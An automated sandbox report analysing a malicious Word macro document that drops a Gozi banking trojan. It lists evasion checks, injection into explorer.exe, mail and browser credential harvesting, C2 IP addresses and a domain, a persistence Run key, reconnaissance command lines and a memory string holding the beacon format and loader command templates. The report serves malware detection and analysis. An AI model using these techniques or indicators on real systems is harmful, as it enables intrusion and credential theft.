Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapter
Found evasive API chain (date check)Show sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain checking for process token informationShow sources
Source: C:\Users\user\text.doc.16147.scrCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-2279
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeAPI coverage: 6.2 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\text.doc.16147.scr TID: 1660Thread sleep count: 68 > 30Jump to behavior
Source: C:\Users\user\text.doc.16147.scr TID: 2728Thread sleep count: 67 > 30Jump to behavior
Source: C:\Windows\explorer.exe TID: 1916Thread sleep time: -10560000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 1916Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\systeminfo.exe TID: 624Thread sleep time: -780000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe TID: 3836Thread sleep count: 70 > 30Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe TID: 3252Thread sleep count: 67 > 30Jump to behavior
Source: C:\Windows\System32\tasklist.exe TID: 2636Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\tasklist.exe TID: 2636Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\driverquery.exe TID: 2116Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\driverquery.exe TID: 2116Thread sleep time: -60000s >= -30000sJump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)Show sources
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01413ECF CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,HeapFree,HeapFree,3_2_01413ECF
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00387121 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,16_2_00387121
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_003874A1 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,16_2_003874A1
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00391663 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,16_2_00391663
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: explorer.exe, 00000005.00000000.1115390919.03B66000.00000004.sdmpBinary or memory string: vmbusres.dllPO
Program exit pointsShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeAPI call chain: ExitProcess graph end node
Queries a list of all running processesShow sources
Source: C:\Users\user\text.doc.16147.scrProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for debuggers (devices)Show sources
Source: C:\Windows\explorer.exeFile opened: C:\Windows\WinSxS\FileMaps\users_user_appdata_roaming_microsoft_aecaider_3fc0094e727c3194.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\systeminfo.exeSystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_00390600 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,16_2_00390600
Enables debug privilegesShow sources
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037DCD8 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,16_2_0037DCD8
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038AB35 RtlExitUserThread,RtlAddVectoredExceptionHandler,OpenEventA,FreeLibrary,HeapFree,16_2_0038AB35

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\explorer.exeNetwork Connect: 37.152.176.90 80Jump to behavior
Source: C:\Windows\explorer.exeNetwork Connect: 178.169.196.83 80Jump to behavior
Source: C:\Windows\explorer.exeNetwork Connect: 46.139.176.151 80Jump to behavior
Allocates memory in foreign processesShow sources
Source: C:\Users\user\text.doc.16147.scrMemory allocated: C:\Windows\explorer.exe base: 1D70000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\explorer.exeMemory allocated: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe base: 1E0000 protect: page execute and read and writeJump to behavior
Changes memory attributes in foreign processes to executable or writableShow sources
Source: C:\Users\user\text.doc.16147.scrMemory protected: C:\Windows\explorer.exe base: 76FDF515 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\text.doc.16147.scrMemory protected: C:\Windows\explorer.exe base: 76FDF515 protect: page execute readJump to behavior
Source: C:\Users\user\text.doc.16147.scrMemory protected: C:\Windows\explorer.exe base: 76FDF515 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\text.doc.16147.scrMemory protected: C:\Windows\explorer.exe base: 76FDF515 protect: page execute readJump to behavior
Creates a thread in another existing process (thread injection)Show sources
Source: C:\Users\user\text.doc.16147.scrThread created: C:\Windows\explorer.exe EIP: 76FDF515Jump to behavior
Injects code into the Windows Explorer (explorer.exe)Show sources
Source: C:\Users\user\text.doc.16147.scrMemory written: PID: 3000 base: 76FDF515 value: EBJump to behavior
Source: C:\Users\user\text.doc.16147.scrMemory written: PID: 3000 base: 1D70000 value: 15Jump to behavior
Source: C:\Users\user\text.doc.16147.scrMemory written: PID: 3000 base: 76FDF515 value: 8BJump to behavior
Maps a DLL or memory area into another processShow sources
Source: C:\Users\user\text.doc.16147.scrSection loaded: unknown target pid: 3000 protection: execute and read and writeJump to behavior
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Users\user\text.doc.16147.scrThread register set: target process: 3000Jump to behavior
Source: C:\Windows\explorer.exeThread register set: target process: 3824Jump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Users\user\text.doc.16147.scrMemory written: C:\Windows\explorer.exe base: 76FDF515Jump to behavior
Source: C:\Users\user\text.doc.16147.scrMemory written: C:\Windows\explorer.exe base: 1D70000Jump to behavior
Source: C:\Users\user\text.doc.16147.scrMemory written: C:\Windows\explorer.exe base: 76FDF515Jump to behavior
Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe base: 496CB5Jump to behavior
Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe base: 1E0000Jump to behavior
Source: C:\Windows\explorer.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe base: 496CB5Jump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo.exe Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\driverquery.exe driverquery.exe Jump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: explorer.exe, 00000005.00000000.1108073105.00D40000.00000002.sdmp, avicbrkr.exe, 00000010.00000002.1218902404.007A0000.00000002.sdmpBinary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.1108073105.00D40000.00000002.sdmp, avicbrkr.exe, 00000010.00000002.1218902404.007A0000.00000002.sdmpBinary or memory string: Progman
Source: explorer.exe, 00000005.00000000.1108073105.00D40000.00000002.sdmp, avicbrkr.exe, 00000010.00000002.1218902404.007A0000.00000002.sdmpBinary or memory string: Shell_TrayWnd
Source: text.doc.16147.scr, 00000003.00000002.1149445314.01417000.00000004.sdmpBinary or memory string: ProgMan
Source: text.doc.16147.scr, 00000003.00000002.1149445314.01417000.00000004.sdmpBinary or memory string: 64RtlSetUnhandledExceptionFilterSystemRoot%08X-%04X-%04X-%04X-%08X%04X{%08X-%04X-%04X-%04X-%08X%04X}ADVAPI32.DLL*.*LdrGetProcedureAddressRtlExitUserThreadCreateRemoteThreadZwWriteVirtualMemoryLdrLoadDllZwProtectVirtualMemorykernelbaseLdrRegisterDllNotificationLdrUnregisterDllNotification\.exe%TEMP%\LowCreateProcessACreateProcessWCreateProcessAsUserACreateProcessAsUserW"%S" "%S"version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%srunascmd.exeLow\DllRegisterServer/C "copy "%s" "%s" /y && rundll32 "%s",%S"/C "copy "%s" "%s" /y && "%s" "%s""ProgManMicrosoft
Source: explorer.exe, 00000005.00000000.1099934971.000ED000.00000004.sdmpBinary or memory string: Progmanp

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0038F3B0 cpuid 16_2_0038F3B0
Contains functionality to create pipes for IPCShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exeCode function: 16_2_0037C19E CreateNamedPipeA,CreateThread,GetLastError,CloseHandle,GetLastError,16_2_0037C19E
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_01414A4D GetCurrentThreadId,GetSystemTimeAsFileTime,GetTempFileNameA,PathFindExtensionA,lstrcpy,3_2_01414A4D
Contains functionality to query windows versionShow sources
Source: C:\Users\user\text.doc.16147.scrCode function: 3_2_014129A4 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_014129A4
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\systeminfo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Overwrites Mozilla Firefox settingsShow sources
Source: C:\Windows\explorer.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.jsJump to behavior

Stealing of Sensitive Information:

barindex
Searches for Windows Mail specific filesShow sources
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail account<.oeaccountJump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknownJump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknownJump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail account{*}.oeaccountJump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknownJump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknownJump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknownJump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *Jump to behavior
Source: C:\Windows\explorer.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknownJump to behavior
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.jsJump to behavior
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 820806 Sample: e41ZuYVo64.docm Startdate: 20/03/2019 Architecture: WINDOWS Score: 100 81 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->81 83 Document exploit detected (drops PE files) 2->83 85 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->85 87 13 other signatures 2->87 9 WINWORD.EXE 316 44 2->9         started        process3 dnsIp4 69 31.148.219.163, 49204, 80 unknown Czech Republic 9->69 49 C:\Users\user\text.doc.16147.scr, PE32 9->49 dropped 105 Document exploit detected (process start blacklist hit) 9->105 14 text.doc.16147.scr 3 9->14         started        file5 signatures6 process7 file8 51 C:\Users\user\AppData\...\avicbrkr.exe, data 14->51 dropped 107 Found stalling execution ending in API Sleep call 14->107 109 Changes memory attributes in foreign processes to executable or writable 14->109 111 Injects code into the Windows Explorer (explorer.exe) 14->111 113 6 other signatures 14->113 18 explorer.exe 11 12 14->18 injected signatures9 process10 dnsIp11 53 46.139.176.151, 49207, 80 HTC-ASMagyarTelekomNyrtHU Hungary 18->53 55 interruption.ru 178.169.196.83, 49205, 80 unknown Romania 18->55 57 2 other IPs or domains 18->57 47 C:\Users\user\AppData\Roaming\...\prefs.js, ASCII 18->47 dropped 89 System process connects to network (likely due to code injection or exploit) 18->89 91 Tries to steal Mail credentials (via file access) 18->91 93 Overwrites Mozilla Firefox settings 18->93 95 5 other signatures 18->95 23 cmd.exe 1 18->23         started        25 cmd.exe 18->25         started        29 avicbrkr.exe 18->29         started        31 9 other processes 18->31 file12 signatures13 process14 dnsIp15 33 systeminfo.exe 2 23->33         started        71 127.0.0.1 unknown unknown 25->71 97 Uses nslookup.exe to query domains 25->97 36 nslookup.exe 25->36         started        99 Detected Gozi e-Banking trojan 29->99 101 Found stalling execution ending in API Sleep call 29->101 103 Performs a network lookup / discovery via net view 31->103 39 driverquery.exe 31->39         started        41 nslookup.exe 31->41         started        43 tasklist.exe 31->43         started        45 net.exe 31->45         started        signatures16 process17 dnsIp18 73 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 33->73 75 Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines) 33->75 77 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 33->77 59 8.8.8.8.in-addr.arpa 36->59 61 1.0.0.127.in-addr.arpa 36->61 79 Writes or reads registry keys via WMI 39->79 63 222.222.67.208.in-addr.arpa 41->63 65 resolver1.opendns.com 41->65 67 myip.opendns.com 41->67 signatures19

Simulations

Behavior and APIs

TimeTypeDescription
16:37:57API Interceptor2207x Sleep call for process: WINWORD.EXE modified
16:38:54API Interceptor1x Sleep call for process: text.doc.16147.scr modified
16:38:57API Interceptor179x Sleep call for process: explorer.exe modified
16:39:18API Interceptor2x Sleep call for process: nslookup.exe modified
16:39:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Auxixpps C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe
16:39:21API Interceptor14x Sleep call for process: systeminfo.exe modified
16:39:28API Interceptor1x Sleep call for process: avicbrkr.exe modified
16:39:30API Interceptor1x Sleep call for process: net.exe modified
16:39:41API Interceptor4x Sleep call for process: tasklist.exe modified
16:39:43API Interceptor4x Sleep call for process: driverquery.exe modified

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Startup

  • System is w7_1
  • WINWORD.EXE (PID: 3384 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 5D798FF0BE2A8970D932568068ACFD9D)
    • text.doc.16147.scr (PID: 3300 cmdline: C:\Users\user\text.doc.16147.scr MD5: 2481F6BE75307B79607D12114D2B6102)
      • explorer.exe (PID: 3000 cmdline: C:\Windows\Explorer.EXE MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • cmd.exe (PID: 472 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\22E8.bi1' MD5: AD7B9C14083B52BC532FBA5948342B98)
          • nslookup.exe (PID: 3096 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: 5E3830EE3282A53920E00784FEC44CFD)
        • cmd.exe (PID: 2076 cmdline: cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\22E8.bi1' MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 3676 cmdline: cmd /C 'systeminfo.exe > C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
          • systeminfo.exe (PID: 3620 cmdline: systeminfo.exe MD5: 258B2ED54FC7F74E2FDCCE5861549C1A)
        • avicbrkr.exe (PID: 3824 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe' MD5: 2481F6BE75307B79607D12114D2B6102)
        • cmd.exe (PID: 3640 cmdline: cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 2260 cmdline: cmd /C 'net view >> C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
          • net.exe (PID: 2316 cmdline: net view MD5: B9A4DAC2192FD78CDA097BFA79F6E7B2)
        • cmd.exe (PID: 2368 cmdline: cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 2248 cmdline: cmd /C 'nslookup 127.0.0.1 >> C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
          • nslookup.exe (PID: 2384 cmdline: nslookup 127.0.0.1 MD5: 5E3830EE3282A53920E00784FEC44CFD)
        • cmd.exe (PID: 2332 cmdline: cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 3964 cmdline: cmd /C 'tasklist.exe /SVC >> C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
          • tasklist.exe (PID: 2468 cmdline: tasklist.exe /SVC MD5: A9A00E71E3DD67B029FC904FE3BB61DA)
        • cmd.exe (PID: 2364 cmdline: cmd /C 'echo -------- >> C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
        • cmd.exe (PID: 2340 cmdline: cmd /C 'driverquery.exe >> C:\Users\user~1\AppData\Local\Temp\152E.bin1' MD5: AD7B9C14083B52BC532FBA5948342B98)
          • driverquery.exe (PID: 2324 cmdline: driverquery.exe MD5: 5D1CFD8CF86F05BB27926C9A6893B635)
  • cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\152E.bin1 Download File
Process:C:\Windows\System32\driverquery.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):14
Entropy (8bit):3.521640636343319
Encrypted:false
MD5:D1B80F6FA9623357B26CB05DAC9AC2F1
SHA1:4FC491B8236B47D574AE1452BC631C307D2D599D
SHA-256:682E6E920242963B0038CC53EE12972B57972649A323505A4AEF1A2028518040
SHA-512:D39557F4E5C26A80FF2B99D1DACCCF11ABCE11E0E56506E5DB6EF2141D19ED5B727719D45C3D79B92AF3D659D681CB9E74525138880EF5F8E9DC791621E5B6F3
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\22E8.bi1 Download File
Process:C:\Windows\System32\cmd.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):11
Entropy (8bit):1.2776134368191157
Encrypted:false
MD5:5B3345909519932D6670D92F16496463
SHA1:6CCABAAC9315486C106AB1BBB7E6F153F5C1A3BD
SHA-256:0B5C0F6FFAC14107357E2C1BFE0DEA06932FD2AA5C8BD598A73F25655F0ABFD5
SHA-512:B41A0E9BA8A092E134E9403EA3C1B080B8F2D1030CE14AFA2647B282F66A76C48A4419D5D0F7C3C78412A427F4B84B8B48349B76FF2C3FD1DA9EC80D2AB14A6B
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\3E76.bin Download File
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):295
Entropy (8bit):5.476401449559547
Encrypted:false
MD5:99BF5BE99FB6241C480F01F00ABF03DF
SHA1:41C6B396383218C274601846E6EC4E614FECEA7F
SHA-256:08FD14CCB4DB396A7906297C79ADE4AF1C2789751B6450C8890ED3BA0514E031
SHA-512:276E5A56881B3130228B65542C5828803A6DECED056AF5818159639A2B0323BFF33F94F26D7CEEADA4738807037ACE0524DE56E667F5F4F05AB5A21B9A02E796
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\46AA.bin Download File
Process:C:\Windows\explorer.exe
File Type:data
Size (bytes):22
Entropy (8bit):1.0476747992754052
Encrypted:false
MD5:76CDB2BAD9582D23C1F6F4D868218D6C
SHA1:B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
SHA-256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
SHA-512:5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\VBE\MSForms.exd Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Size (bytes):162688
Entropy (8bit):4.381015373024907
Encrypted:false
MD5:A81620BAE6D87B84CF3AAF64C0DA900E
SHA1:9007EC316AB228DDEF55FC10A9F181E9CAA61AF5
SHA-256:366ED4A308AF41334A0143E3E70417DDDD5633FA13307E50FF4DE1A1FB4636D6
SHA-512:C7A2239F1444FBD1576F35C7BF5659D463A47EECAE84655E6EF75C4ECA86DEED710A733BF59FEAB080617447AB029A928DA4BE150674E3DE93FA8637CCE0D3F3
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UUY831YK\logo2[1].png Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:PNG image, 1024 x 718, 8-bit/color RGBA, non-interlaced
Size (bytes):783688
Entropy (8bit):6.7930378581918065
Encrypted:false
MD5:E1023D92D82A739D36EF0829181F6400
SHA1:63D822824784E415075D3B82E83E9D975C45B398
SHA-256:847E7B3DB2C1854DE2583FE92E92CCDF41EAB1B9EB3B206E2C613CD5A51253F9
SHA-512:30997818308C79FC354FC71B8A4FDC69619FBE0C17AD2579D02B1B1C308C0F4A912E919739B29CE120B6E07C2A779FDBC008E57D6E0AE806FFAE5F0796E99890
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F3A4E48.jpeg Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:JPEG image data, JFIF standard 1.01, comment: "Compressed by jpeg-recompress"
Size (bytes):25424
Entropy (8bit):7.609333219786242
Encrypted:false
MD5:EC5B4D92C61DC2A7038F47526DAA0193
SHA1:4E0CA3B4D96D4DCC403074249E1A08C154448BAA
SHA-256:690EC28A885226FE4B34BA27B8AC192FC70396B3F021F66EBD9F6353FD01633B
SHA-512:93AC9753D07DBF90892BA5A9BAEE2EEB8AA15D651F97D114EAC25713A0B2C3D9DE29ADF6CCACD27A0F451C9AEB561334621A3CC3DAB04F601ACE6D9E8B548785
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5A232E75-C856-4E53-862B-238266D16244}.tmp Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Size (bytes):1536
Entropy (8bit):0.11299086186625841
Encrypted:false
MD5:8B347FDA3FEE51BA1C633228915143FE
SHA1:F806A13E35A41E50A91347F126A3B1EACEF249CF
SHA-256:0B0F78FF079D19EABE0C0761D46EE9AC82D53FDB09E26EC547A80AE081B4D98C
SHA-512:0AB13C1E4FE1C230CFD099A1DE3387459CD2AEB0F64D55CBA4F8D5E80F6025F5DF085BE188773E450929948ED1EF53F7C1F4BAF491F2CA9B0C766A238A7AF29D
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Aecaider\avicbrkr.exe Download File
Process:C:\Users\user\text.doc.16147.scr
File Type:data
Size (bytes):787953
Entropy (8bit):6.32567986145091
Encrypted:false
MD5:421C21B09E3C705F66A36364C20290DE
SHA1:675D949DDF963F3128616C154A8B8D4B96F385D5
SHA-256:9CC6EF91CFDDBE6D60A6AD78D661BCF3647D0093E06BA37B6EE6A49CFFD93610
SHA-512:D19D1A39827574C8C8754486FC27219EAD5A4BB73ABCA3AAD21A2D25E51EC0B0CA503D05E9DB7010D8177B772FB386EA549E720DB6EE158E833BB0DD85DFE541
Malicious:true
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows shortcut
Size (bytes):1134
Entropy (8bit):4.591801330941196
Encrypted:false
MD5:3F67EA96D5DD461AEE0F99236BD6038A
SHA1:ED3F56BD84EB40592431096112EC5733E8FCE7B1
SHA-256:97A71E2BBFA4AF165188DB498B90E7B9E1D47B6C7D4EAE4D03ECDAB9CE16BE50
SHA-512:D4E0513478B2ADD0889C846E8CA1FD0F50FDD88CA18EFA3D18285282C3BDD54F03A159A3E1AD0D8164D4C39642B2802317B7C881C44D0F86A8380299403417DD
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\e41ZuYVo64.LNK Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows shortcut
Size (bytes):2076
Entropy (8bit):4.56991417033767
Encrypted:false
MD5:E798401EEB606E114B0D45A264A21BF4
SHA1:17C3A20317EDC9BDE3FB95134BEB9DAE3BAA67EE
SHA-256:8293282B81FD6C1AF23060C15C0FF365E77B80DCB21F7E67BEE1D87D672821FE
SHA-512:A83AFF5799849EC58C501006CD68D59301A25E8FA5B1487D0266774CECD6D195365A2E6DA168E4B711286EE192735E01FDFC4CB322D216B2FC788C0BDB8DD200
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:ASCII text, with CRLF line terminators
Size (bytes):72
Entropy (8bit):4.768980259211503
Encrypted:false
MD5:2FC9250FBD18EA48397AB440A83B75EF
SHA1:85F2F9A40AA95346161B1E9F6F3FF82DB941D3F6
SHA-256:C097727BD20AA3DC68FF382DC36553F42AE4038C805B89BBD84C684CCC05290C
SHA-512:EC24A4456DC6F27F2DBD1584E22EF5E9CCCA726FE0827BBE60E1050B683E4561331552D0E906DDEA9CA9E60FC0D3E7D39D59389382071A5A1072157089D8E946
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
